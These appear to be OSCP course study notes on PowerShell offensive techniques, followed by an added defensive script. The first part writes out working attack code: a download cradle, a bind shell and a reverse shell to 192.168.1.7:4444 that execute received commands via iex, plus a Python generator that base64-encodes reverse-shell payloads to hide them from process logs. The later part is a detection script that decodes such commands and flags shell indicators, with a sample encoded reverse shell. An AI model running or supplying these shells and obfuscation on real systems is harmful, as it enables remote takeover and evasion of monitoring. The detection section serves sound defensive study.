Limbo

Offensive Security Certified Professional / OSCP | Module 4 - Practical Tools 3

Limbo, May 23, 2020
  • Code:
    PowerShell
    
    ##########
    Intro:
    
    Set-ExecutionPolicy Unrestricted
    Get-ExecutionPolicy
    Get-ChildItem
    Get-Alias
    ---------------------------------------------------------------------------------
    PowerShell File Transfers:
    
    powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.1.7:8888/out.zip','C:\Users\limbo\Desktop\out.zip')"
    ---------------------------------------------------------------------------------
    PowerShell Bind Shells:
    
    powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"
    ---------------------------------------------------------------------------------
    PowerShell Reverse Shells:
    
    powershell -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.7',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
    ---------------------------------------------------------------------------------
    
    ----------------------------
    #!/usr/bin/env python3
    #
    # generate reverse powershell cmdline with base64 encoded args
    #

    import sys
    import base64

    def help():
        print("USAGE: %s IP PORT" % sys.argv[0])
        print("Returns reverse shell PowerShell base64 encoded cmdline payload connecting to IP:PORT")
        sys.exit(1)

    try:
        (ip, port) = (sys.argv[1], int(sys.argv[2]))
    except (IndexError, ValueError):  # missing argument or non-numeric port
        help()

    # payload from Nikhil Mittal @samratashok
    # https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3

    payload = '$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
    payload = payload % (ip, port)

    # -EncodedCommand expects base64 of the script as UTF-16LE without a byte-order mark
    cmdline = "powershell -e " + base64.b64encode(payload.encode('utf-16le')).decode()

    print(cmdline)
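The generator above shows the encoding side: the script is turned into UTF-16LE, base64-encoded and handed to `powershell -e`, so the actual command never appears in clear text in process-creation logs. The defender's counterpart is to reverse that step and inspect what was run. The example below is an added illustration, not part of these notes: it pulls the `-e`/`-enc`/`-EncodedCommand` argument out of a command line as it would appear in Windows 4688 or Sysmon Event ID 1 telemetry, decodes it, and flags the same strings used in the one-liners above (`TCPClient`, `TcpListener`, `WebClient`, `DownloadFile`, `iex`). The log lines and the `10.0.0.5` address are constructed for the example.

```python
#!/usr/bin/env python3
#
# Decode and triage "powershell -e <base64>" command lines as they appear in
# process-creation telemetry (Windows Security 4688, Sysmon Event ID 1).
# Added example, not part of the original notes; the sample log lines are
# constructed, not captured from a real host.

import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
# with either "-" or "/" as the switch character; capture every "<switch> <value>" pair.
SWITCH = re.compile(r"(?:^|\s)[-/]([A-Za-z]+)\s+([A-Za-z0-9+/=]+)")

# Strings from the one-liners in the notes that mark a shell or download cradle.
INDICATORS = (
    "Net.Sockets.TCPClient",
    "Net.Sockets.TcpListener",
    "Net.WebClient",
    "DownloadFile",
    "DownloadString",
    "Invoke-Expression",
    "iex ",
)

def encode_command(script: str) -> str:
    """Build the -EncodedCommand argument the way the generator script does:
    UTF-16LE without a byte-order mark, then base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

def extract_encoded(cmdline: str):
    """Return the base64 argument of an encoded-command switch, or None."""
    for m in SWITCH.finditer(cmdline):
        flag, value = m.group(1).lower(), m.group(2)
        # "-e" alone is enough for PowerShell, so test the flag as a prefix of the full name.
        if "encodedcommand".startswith(flag):
            return value
    return None

def decode_encoded(b64: str):
    """Decode a base64/UTF-16LE command; return None if it is not valid."""
    padded = b64 + "=" * (-len(b64) % 4)   # tolerate stripped "=" padding
    try:
        raw = base64.b64decode(padded, validate=True)
        return raw.decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None

def triage(cmdline: str) -> dict:
    """Classify one command line: decoded script (if any) and matched indicators."""
    b64 = extract_encoded(cmdline)
    script = decode_encoded(b64) if b64 else None
    # Search the decoded script when there is one, otherwise the raw command line.
    haystack = (script or cmdline).lower()
    hits = [ind for ind in INDICATORS if ind.lower() in haystack]
    return {"encoded": b64 is not None, "script": script, "indicators": hits}

def scan(log_lines):
    """Return (host, indicators, decoded script) for each line that matches an indicator."""
    findings = []
    for host, cmdline in log_lines:
        result = triage(cmdline)
        if result["indicators"]:
            findings.append((host, result["indicators"], result["script"]))
    return findings

# Constructed sample telemetry: (hostname, CommandLine). The encoded entry wraps a
# shortened one-liner of the shape shown in the notes, pointed at a placeholder address.
REVERSE_SHELL = ('$client = New-Object System.Net.Sockets.TCPClient("10.0.0.5",4444);'
                 '$stream = $client.GetStream();$data = "Get-Process";iex $data')
SAMPLE_LOG = [
    ("ws01", 'powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1'),
    ("ws02", "powershell -nop -w hidden -e " + encode_command(REVERSE_SHELL)),
    ("ws03", "powershell.exe -EncodedCommand " + encode_command("Get-Date")),
    ("ws04", 'powershell -c "(new-object System.Net.WebClient).DownloadFile(\'http://10.0.0.5/a.zip\',\'C:\\a.zip\')"'),
]

if __name__ == "__main__":
    for host, hits, script in scan(SAMPLE_LOG):
        print(f"{host}: {', '.join(hits)}")
        if script:
            print("  decoded:", script[:80])
```

Only `ws02` and `ws04` are reported: the encoded `Get-Date` on `ws03` decodes to nothing suspicious, which is the point of decoding before alerting rather than treating every `-e` as hostile. Matching on the decoded text is also what defeats the encoding step the generator relies on; a rule that only looks at the raw command line sees nothing but base64.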